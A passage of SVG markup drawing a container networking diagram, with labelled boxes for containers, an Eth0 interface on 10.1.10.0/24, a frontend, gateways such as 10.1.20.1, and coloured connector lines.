90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#000000" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.0208955223880598,0.5491841491841488)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.9795321637426899,1.8208828522920215)"><path fill="#4cacf5" stroke="none" d="M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" opacity="0.97"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 92.08955223880598 0 Q 102.08955223880598 0 102.08955223880598 10 L 102.08955223880598 44.91841491841488 Q 102.08955223880598 54.91841491841488 92.08955223880598 54.91841491841488 L 10 54.91841491841488 Q 0 54.91841491841488 0 44.91841491841488 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.97"/></g></g></g></g></g><g transform="matrix(1,0,0,1,67,424)"><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="44" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="83" height="14" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">Container</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="61" y="12">(</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="65" y="12">s</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="71" y="12">)</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="83" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="28" y="14" width="73" height="30" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="normal" text-decoration="" line-height="15.5px" x="28" y="27">Eth0</text></g><g transform="translate(69,71) matrix(1,0,0,1,0,0) translate(-69,-71)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="29" width="73" height="15" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="5" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="20" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="23" y="42">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="31" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="34" y="42">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="49" y="42">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="52" y="42">0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="60" y="42">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="13px" font-style="normal" font-weight="bold" text-decoration="" line-height="15.5px" x="63" y="42">24</text></g></g><g transform="matrix(1,0,0,1,53,502)"><g transform="translate(30,0) matrix(1,0,0,1,0,0) translate(-30,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(30,0) matrix(1,0,0,1,0,0) translate(-30,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="132" height="20" fill-opacity="0"/></g></g><g transform="translate(30,0) matrix(1,0,0,1,0,0) translate(-30,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="30" y="0" width="74" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="30" y="17">Frontend</text></g></g><g transform="matrix(1,0,0,1,271.50000000000006,96.41047267550272)"><g transform="translate(0,0)"><g transform="translate(-274,-128.00000000000003) translate(2.499999999999943,31.58952732449731) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#ff9900" d="M 278.00000000000006 102.91047267550272 M 278.00000000000006 102.91047267550272 L 278.00000000000006 108.91047267550272 M 278.00000000000006 108.91047267550272 M 278.00000000000006 114.91047267550272 L 278.00000000000006 120.91047267550272 M 278.00000000000006 120.91047267550272 M 278.00000000000006 126.91047267550272 L 278.00000000000006 132.91047267550272 M 278.00000000000006 132.91047267550272 M 278.00000000000006 138.91047267550272 L 278.00000000000006 144.91047267550272 M 278.00000000000006 144.91047267550272 M 278.00000000000006 150.91047267550272 L 278.00000000000006 156.91047267550272 M 278.00000000000006 156.91047267550272 M 278.00000000000006 162.91047267550272 L 278.00000000000006 168.91047267550272 M 278.00000000000006 168.91047267550272 M 278.00000000000006 174.91047267550272 L 278.00000000000006 180.91047267550272 M 278.00000000000006 180.91047267550272 M 278.00000000000006 186.91047267550272 L 278.00000000000006 192.91047267550272 M 278.00000000000006 192.91047267550272 M 278.00000000000006 198.91047267550272 L 278.00000000000006 204.91047267550272 M 278.00000000000006 204.91047267550272 M 278.00000000000006 210.91047267550272 L 278.00000000000006 216.91047267550272 M 278.00000000000006 216.91047267550272 M 278.00000000000006 222.91047267550272 L 278.00000000000006 228.91047267550272 M 278.00000000000006 228.91047267550272 M 278.00000000000006 234.91047267550272 L 278.00000000000006 240.91047267550272 M 278.00000000000006 240.91047267550272 M 278.00000000000006 246.91047267550272 L 278.00000000000006 252.91047267550272 M 278.00000000000006 252.91047267550272 M 278.00000000000006 258.9104726755027 L 278.00000000000006 264.9104726755027 M 278.00000000000006 264.9104726755027 M 278.00000000000006 270.9104726755027 L 278.00000000000006 276.9104726755027 M 278.00000000000006 276.9104726755027 M 278.00000000000006 282.9104726755027 L 278.00000000000006 288.9104726755027 M 278.00000000000006 288.9104726755027 M 278.00000000000006 294.9104726755027 L 278.0000000000001 300.9104726755027 M 278.0000000000001 300.9104726755027" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,284.40277777777806,243.31491457745426)"><g transform="translate(0,0)"><g transform="translate(-104.62600160256406,-181.95081824533966) translate(-179.776776175214,-61.3640963321146) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#cc0000" d="M 395.6805555555633 368.59527295942837 M 395.6805555555633 368.59527295942837 L 395.6805555555633 362.59527295942837 M 395.6805555555633 362.59527295942837 M 395.6805555555633 356.59527295942837 L 395.6805555555633 350.59527295942837 M 395.6805555555633 350.59527295942837 M 395.6805555555633 344.59527295942837 L 395.6805555555633 338.59527295942837 M 395.6805555555633 338.59527295942837 M 395.6805555555633 332.59527295942837 L 395.6805555555633 326.59527295942837 M 395.6805555555633 326.59527295942837 M 395.6805555555633 320.59527295942837 L 395.6805555555633 314.59527295942837 M 395.6805555555633 314.59527295942837 M 395.6454730957975 308.5959974887863 Q 395.42473204507803 305.08992137071624 393.81507437340014 302.97276187360467 M 393.81507437340014 302.97276187360467 M 388.7448234749301 300.0250475217899 Q 387.3524512811001 299.74552399008303 385.6805555555633 299.74552399008303 L 382.7625569263178 299.74552399008303 M 382.7625569263178 299.74552399008303 M 376.7625569263178 299.74552399008303 L 370.7625569263178 299.74552399008303 M 370.7625569263178 299.74552399008303 M 364.7625569263178 299.74552399008303 L 358.7625569263178 299.74552399008303 M 358.7625569263178 299.74552399008303 M 352.7625569263178 299.74552399008303 L 346.7625569263178 299.74552399008303 M 346.7625569263178 299.74552399008303 M 340.7625569263178 299.74552399008303 L 334.7625569263178 299.74552399008303 M 334.7625569263178 299.74552399008303 M 328.7625569263178 299.74552399008303 L 322.7625569263178 299.74552399008303 M 322.7625569263178 299.74552399008303 M 316.7625569263178 299.74552399008303 L 310.7625569263178 299.74552399008303 M 310.7625569263178 299.74552399008303 M 304.7625569263178 299.74552399008303 L 300.90277777777806 299.74552399008303 Q 299.7712873305603 299.74552399008303 298.7678239465571 299.6174969268685 M 298.7678239465571 299.6174969268685 M 293.3857693473039 297.228457504614 Q 291.4531834876415 295.28265607285664 291.0247864262038 291.83266584287463 M 291.0247864262038 291.83266584287463 M 290.90277777777806 285.8375555400254 L 290.90277777777806 279.8375555400254 M 290.90277777777806 279.8375555400254 M 290.90277777777806 273.8375555400254 L 290.90277777777806 267.8375555400254 M 290.90277777777806 267.8375555400254 M 290.90277777777806 261.8375555400254 L 290.90277777777806 255.8375555400254 M 290.90277777777806 255.8375555400254 M 290.90277777777806 249.8375555400254 L 290.90277777777806 249.81491457745426" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,284.40277777777794,125.75909597261261)"><g transform="translate(0,0)"><g transform="translate(-520.5887419871792,-284.3176338453479) translate(236.18596420940128,158.55853787273531) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#cc0000" d="M 399.0972222222224 132.2590959726126 M 399.0972222222224 132.2590959726126 L 399.0972222222224 138.2590959726126 M 399.0972222222224 138.2590959726126 M 399.0972222222224 144.2590959726126 L 399.0972222222224 150.2590959726126 M 399.0972222222224 150.2590959726126 M 399.0972222222224 156.2590959726126 L 399.0972222222224 162.2590959726126 M 399.0972222222224 162.2590959726126 M 399.0972222222224 168.2590959726126 L 399.0972222222224 174.2590959726126 M 399.0972222222224 174.2590959726126 M 399.0972222222224 180.2590959726126 L 399.0972222222224 186.2590959726126 M 399.0972222222224 186.2590959726126 M 399.0972222222224 192.2590959726126 L 399.0972222222224 192.67013315779485 Q 399.0972222222224 195.91836389834842 398.0421219278347 198.11149434451426 M 398.0421219278347 198.11149434451426 M 393.6659405128273 201.97829744802294 Q 391.72749922241087 202.67013315779496 389.0972222222224 202.67013315779502 L 387.7405118088071 202.67013315779505 M 387.7405118088071 202.67013315779505 M 381.7405118088071 202.67013315779514 L 375.7405118088071 202.67013315779522 M 375.7405118088071 202.67013315779522 M 369.7405118088071 202.6701331577953 L 363.7405118088071 202.6701331577954 M 363.7405118088071 202.6701331577954 M 357.7405118088071 202.67013315779548 L 351.7405118088071 202.67013315779556 M 351.7405118088071 202.67013315779556 M 345.7405118088071 202.67013315779565 L 339.7405118088071 202.67013315779573 M 339.7405118088071 202.67013315779573 M 333.7405118088071 202.67013315779585 L 327.7405118088071 202.67013315779593 M 327.7405118088071 202.67013315779593 M 321.7405118088071 202.67013315779604 L 315.7405118088071 202.67013315779613 M 315.7405118088071 202.67013315779613 M 309.7405118088071 202.67013315779624 L 303.7405118088071 202.67013315779633 M 303.7405118088071 202.67013315779633 M 297.7598678856485 202.9657135423712 Q 294.4328042761472 203.65647640532174 292.72003362291935 205.9615322245457 M 292.72003362291935 205.9615322245457 M 290.93300792210687 211.60072437358687 Q 290.90277777777794 212.12031369352724 290.90277777777794 212.67013315779656 L 290.90277777777794 217.600146725365 M 290.90277777777794 217.600146725365 M 290.90277777777794 223.600146725365 L 290.90277777777794 229.600146725365 M 290.90277777777794 229.600146725365 M 290.90277777777794 235.600146725365 L 290.90277777777794 241.600146725365 M 290.90277777777794 241.600146725365 M 290.90277777777794 247.600146725365 L 290.90277777777794 251.03945435457118" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,155.81944444443684,107.17033542596326)"><g transform="translate(0,0)"><g transform="translate(-453.3739983974361,-305.60207610719107) translate(297.55455395299924,198.4317406812278) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#38761d" d="M 162.31944444443684 113.67033542596326 M 162.31944444443684 113.67033542596326 L 162.31944444443684 119.67033542596326 M 162.31944444443684 119.67033542596326 M 162.31944444443684 125.67033542596326 L 162.31944444443684 131.67033542596326 M 162.31944444443684 131.67033542596326 M 162.31944444443684 137.67033542596326 L 162.31944444443684 143.67033542596326 M 162.31944444443684 143.67033542596326 M 162.31944444443684 149.67033542596326 L 162.31944444443684 155.67033542596326 M 162.31944444443684 155.67033542596326 M 162.31944444443684 161.67033542596326 L 162.31944444443684 167.67033542596326 M 162.31944444443684 167.67033542596326 M 162.31944444443684 173.67033542596326 L 162.31944444443684 179.67033542596326 M 162.31944444443684 179.67033542596326 M 162.31944444443684 185.67033542596326 L 162.31944444443684 189.5415587499461 Q 162.31944444443684 190.66665091919444 162.44602768336722 191.66515984951238 M 162.44602768336722 191.66515984951238 M 164.82839767826374 197.05049598033753 Q 166.77191548654997 198.987072120429 170.22094619965992 199.41813535569676 M 170.22094619965992 199.41813535569676 M 176.2159687190514 199.5415587499461 L 182.2159687190514 199.5415587499461 M 182.2159687190514 199.5415587499461 M 188.2159687190514 199.5415587499461 L 194.2159687190514 199.5415587499461 M 194.2159687190514 199.5415587499461 M 200.2159687190514 199.5415587499461 L 206.2159687190514 199.5415587499461 M 206.2159687190514 199.5415587499461 M 212.2159687190514 199.5415587499461 L 218.2159687190514 199.5415587499461 M 218.2159687190514 199.5415587499461 M 224.2159687190514 199.5415587499461 L 230.2159687190514 199.5415587499461 M 230.2159687190514 199.5415587499461 M 236.2159687190514 199.5415587499461 L 242.2159687190514 199.5415587499461 M 242.2159687190514 199.5415587499461 M 248.2159687190514 199.5415587499461 L 254.2159687190514 199.5415587499461 M 254.2159687190514 199.5415587499461 M 260.1975055563821 199.82836878769723 Q 263.5309416038837 200.5080005580397 265.2539063203237 202.79810365944377 M 265.2539063203237 202.79810365944377 M 267.0644085030223 208.4287072615088 Q 267.09722222222206 208.96872614612755 267.09722222222206 209.5415587499461 L 267.09722222222206 214.4280528453731 M 267.09722222222206 214.4280528453731 M 267.09722222222206 220.4280528453731 L 267.09722222222206 226.4280528453731 M 267.09722222222206 226.4280528453731 M 267.09722222222206 232.4280528453731 L 267.09722222222206 235.81551770804643" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="matrix(1,0,0,1,152.4027777777773,228.0562890247442)"><g transform="translate(0,0)"><g transform="translate(-37.41125801282108,-200.3354013688455) translate(-114.99151976495621,-27.72088765589868) matrix(1,0,0,1,0,0)"><g><path fill="none" stroke="#38761d" d="M 158.9027777777773 356.7014713068111 M 158.9027777777773 356.7014713068111 L 158.9027777777773 350.7014713068111 M 158.9027777777773 350.7014713068111 M 158.9027777777773 344.7014713068111 L 158.9027777777773 338.7014713068111 M 158.9027777777773 338.7014713068111 M 158.9027777777773 332.7014713068111 L 158.9027777777773 326.7014713068111 M 158.9027777777773 326.7014713068111 M 158.9027777777773 320.7014713068111 L 158.90277777777732 314.7014713068111 M 158.90277777777732 314.7014713068111 M 158.9386276948351 308.7022201112491 Q 159.16189382506047 305.19660315095655 160.77561686556083 303.081443100939 M 160.77561686556083 303.081443100939 M 165.85041734767782 300.14100539293156 Q 167.23802796592435 299.86386619932506 168.90277777777732 299.863866199325 L 171.83292026888248 299.8638661993249 M 171.83292026888248 299.8638661993249 M 177.83292026888248 299.86386619932466 L 183.83292026888248 299.86386619932443 M 183.83292026888248 299.86386619932443 M 189.83292026888248 299.8638661993242 L 195.83292026888248 299.863866199324 M 195.83292026888248 299.863866199324 M 201.83292026888248 299.86386619932375 L 207.83292026888248 299.8638661993235 M 207.83292026888248 299.8638661993235 M 213.83292026888248 299.8638661993233 L 219.83292026888248 299.86386619932307 M 219.83292026888248 299.86386619932307 M 225.83292026888248 299.86386619932284 L 231.83292026888248 299.8638661993226 M 231.83292026888248 299.8638661993226 M 237.83292026888248 299.8638661993224 L 243.83292026888248 299.86386619932216 M 243.83292026888248 299.86386619932216 M 249.83292026888248 299.86386619932193 L 255.83292026888248 299.86386619932176 M 255.83292026888248 299.86386619932176 M 261.7528202251644 299.1405476054279 Q 264.7675844859315 298.0314529459795 266.0817275073145 295.22173704714703 M 266.0817275073145 295.22173704714703 M 267.0972222222195 289.3604205540609 L 267.0972222222195 283.3604205540609 M 267.0972222222195 283.3604205540609 M 267.0972222222195 277.3604205540609 L 267.0972222222195 271.3604205540609 M 267.0972222222195 271.3604205540609 M 267.0972222222195 265.3604205540609 L 267.0972222222195 259.3604205540609 M 267.0972222222195 259.3604205540609 M 267.0972222222195 253.3604205540609 L 267.0972222222195 247.3604205540609 M 267.0972222222195 247.3604205540609 M 267.0972222222195 241.3604205540609 L 267.0972222222195 235.3604205540609 M 267.0972222222195 235.3604205540609" stroke-miterlimit="10" stroke-width="6"/></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,193.51767083236396,40.461511948529306)"><g><g transform="translate(0,0) scale(1.7520258247164675,1.25824690354917) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#ff9900" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,213,55)"><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="56" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="18" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Gateway</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="69" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="69" y="12">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="82" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="86" y="12">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="92" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="96" y="12">20</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="109" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="112" y="12">1</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="137" height="28" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="14" width="4" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="14" width="58" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="9" y="26">and</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="26">other</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="63" y="14" width="129" height="28" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="26">containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="122" y="26">on</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="7" y="40">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="27" y="40">same</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="40">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="40">/</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="94" y="28" width="37" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="94" y="40">subnet</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="67" y="42" width="5" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g/></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,345.9019607843137,48.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,341.48549019607844,44.15384615384616)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,336,39.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,57.51767083236396,94.4615119485293)"><g><g transform="translate(0,0) scale(1.7520258247164675,1.25824690354917) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#38761d" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,77,109)"><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="56" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="18" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Gateway</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect 